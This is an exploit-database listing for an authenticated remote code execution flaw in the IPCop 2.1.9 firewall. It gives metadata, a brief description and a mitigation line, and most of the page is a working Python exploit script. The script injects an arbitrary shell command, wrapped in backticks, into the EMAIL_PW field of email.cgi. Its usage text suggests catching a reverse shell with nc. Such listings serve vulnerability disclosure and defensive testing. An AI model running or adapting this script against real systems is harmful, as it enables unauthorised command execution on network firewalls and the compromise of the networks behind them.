header-logo
Suggest Exploit
vendor:
IPCop
by:
Mücahit Saratar
9,8
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: IPCop
Affected Version From: 2.1.8
Affected Version To: 2.1.9
Patch Exists: YES
Related CWE: N/A
CPE: a:ipcop:ipcop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Parrot OS 5.7.0-2parrot2-amd64
2021

IPCop 2.1.9 – Remote Code Execution (RCE) (Authenticated)

This exploit allows an authenticated user to execute arbitrary code on the IPCop 2.1.9 system. The exploit works by sending a malicious POST request to the email.cgi script, which is used to configure the email settings. The malicious payload is sent in the EMAIL_PW parameter, which is then executed by the system. The exploit requires the attacker to have valid credentials for the system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all users have strong passwords and that the system is kept up to date with the latest security patches.
Source

Exploit-DB raw data:

# Exploit Title: IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/08/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipcop.org/
# Software Link: https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.8/ipcop-2.1.8-install-cd.i486.iso - https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.9/ipcop-2.1.9-update.i486.tgz.gpg
# Version: 2.1.9
# Tested on: parrot os 5.7.0-2parrot2-amd64

#!/usr/bin/python3

import requests as R
import os
import sys
import base64
import urllib3

R.packages.urllib3.disable_warnings()
R.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
    R.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
    # no pyopenssl support used / needed / available
    pass

try:
    hostport = sys.argv[1]
    assert hostport[:8] == "https://" and hostport[-1] == "/"
    url = hostport + "cgi-bin/email.cgi"
    username = sys.argv[2].encode()
    password = sys.argv[3].encode()
    auth = base64.b64encode(username+b":"+password).decode()
    command = sys.argv[4]
    assert " " in command
except:
    print("[-] Usage https://host:port/ username password command(no spaces) <port for listen with nc - optional - >")
    exit(1)


rheader = {"Authorization":"Basic "+auth,
        "Origin": hostport,
        "Referer": url}

rdata = {
        "EMAIL_SERVER": "mucahitsaratar.github.io",
        "EMAIL_USE_TLS": "auto",
        "EMAIL_SERVER_PORT": "1337",
        "EMAIL_USR": "ipcop@localdomain",
        "EMAIL_PW": f"`{command}`",
        "EMAIL_FROM": "ipcop@localdomainn",
        "EMAIL_TO": "ipcop@localdomainnn",
        "ACTION": "Kaydet" # change here to what is mean the "save && send test mail" in target language
        }


R.post(url,headers=rheader, data=rdata, verify=False)
rdata["ACTION"] = "Test postası gönder" # send test mail
R.post(url,headers=rheader, data=rdata, verify=False)

Navigation

Suggest Exploit

Services By CQR